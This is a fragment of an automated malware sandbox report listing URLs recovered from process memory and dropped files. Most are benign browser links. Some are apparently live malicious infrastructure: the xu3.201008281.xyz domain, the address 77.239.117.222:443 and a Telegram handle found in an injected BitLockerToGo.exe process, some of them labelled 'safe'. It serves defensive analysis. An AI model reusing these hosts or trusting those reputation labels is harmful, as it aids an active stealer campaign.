                        apis.google.com
                        		unknown
                        		unknownfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719835274.000042E8006D8000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drfalse
                            		high
                            https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drfalse
                                		high
                                https://xu3.201008281.xyzLBitLockerToGo.exe, 00000004.00000003.2547614534.0000000002D90000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000006.00000002.2717416488.000042E80008C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.google.com/document/Jchrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000006.00000002.2719865844.000042E8006F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720069154.000042E800790000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://anglebug.com/4633chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://anglebug.com/7382chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drfalse
                                              		high
                                              https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:chrome.exe, 00000006.00000002.2717695800.000042E80015C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://issuetracker.google.com/284462263chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722634762.000042E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://polymer.github.io/AUTHORS.txtchrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657450118.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657400461.000042E800D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654178285.000042E801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657519614.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657629442.000042E800F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718219018.000042E8002FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://docs.google.com/chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/document/:chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://xu3.201008281.xyzbBitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000006.00000002.2718219018.000042E8002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653451478.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721163304.000042E800A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://anglebug.com/7714chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://xu3.201008281.xyzlBitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://xu3.201008281.xyzo#BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://unisolated.invalid/chrome.exe, 00000006.00000002.2720869382.000042E8009B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://77.239.117.222:443hellohttps://t.me/b4cha00oomaino5Mozilla/5.0BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.google.com/chrome/tips/chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722029915.000042E800C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720744601.000042E80096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720340229.000042E800850000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.google.com/?lfhs=2chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anglebug.com/6248chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000006.00000002.2728972284.000042E801394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://anglebug.com/6929chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://anglebug.com/5281chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.youtube.com/?feature=ytcachrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Htchrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://myaccount.google.com/shielded-email?utm_source=chromeBchrome.exe, 00000006.00000003.2680495923.000042E80175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680463208.000042E80174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680429971.000042E801748000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drfalse
                                                                                            		high
                                                                                            https://issuetracker.google.com/255411748chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://xu3.201008281.xyz/?BitLockerToGo.exe, 00000004.00000002.3077779603.00000000053D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722634762.000042E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://xu3.201008281.xyzr#BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://anglebug.com/7246chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://anglebug.com/7369chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://anglebug.com/7489chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://duckduckgo.com/?q=chrome.exe, 00000006.00000002.2719387751.000042E8005A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://chrome.google.com/webstorechrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://drive-daily-2.corp.google.com/chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657450118.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657400461.000042E800D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654178285.000042E801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657519614.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657629442.000042E800F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718219018.000042E8002FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://t.me/b4cha00oBitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000006.00000002.2719356402.000042E800594000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719835274.000042E8006D8000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drfalse
                                                                                                                    		high
                                                                                                                    https://xu3.201008281.xyz/0BitLockerToGo.exe, 00000004.00000002.3076528162.00000000050B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaBitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drfalse
                                                                                                                      		high
                                                                                                                      https://issuetracker.google.com/161903006chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://xu3.201008281.xyz/2BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drfalse
                                                                                                                          		high
                                                                                                                          https://drive-daily-1.corp.google.com/chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://drive-daily-5.corp.google.com/chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://duckduckgo.com/favicon.icochrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719097058.000042E8004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000006.00000002.2726073930.000042E800FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718938238.000042E800498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720069154.000042E800790000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://plus.google.comchromecache_69.8.drfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/3078chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://anglebug.com/7553chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/5375chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/5371chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/4722chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/9rchrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Zschrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000006.00000003.2639287139.000042E8001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719097058.000042E8004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/7556chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://chromewebstore.google.com/chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://drive-preprod.corp.google.com/chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://xu3.201008281.xyz/tem32BitLockerToGo.exe, 00000004.00000002.3076528162.00000000050B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBitLockerToGo.exe, 00000004.00000002.3076528162.00000000050DD000.00000004.00000020.00020000.00000000.sdmp, 58y5fk.4.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/kschrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://clients4.google.com/chrome-syncchrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://unisolated.invalid/achrome.exe, 00000006.00000002.2720869382.000042E8009B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/6692chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://issuetracker.google.com/258207403chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3502chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/3623chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/3625chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/3624chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://docs.google.com/presentation/Jchrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5007chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
